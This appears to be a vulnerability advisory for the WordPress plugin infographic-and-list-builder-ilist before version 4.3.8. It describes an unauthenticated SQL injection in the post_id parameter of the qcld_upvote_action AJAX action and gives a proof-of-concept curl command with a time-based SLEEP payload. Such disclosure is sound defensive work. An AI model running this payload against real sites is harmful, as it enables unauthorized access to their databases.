The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection
curl https://example.com/wp-admin/admin-ajax.php --data ‘action=qcld_upvote_action&post;_id=(CASE WHEN (78=78) THEN SLEEP(5) ELSE 6639 END)’
CPE | Name | Operator | Version |
---|---|---|---|
infographic-and-list-builder-ilist | lt | 4.3.8 |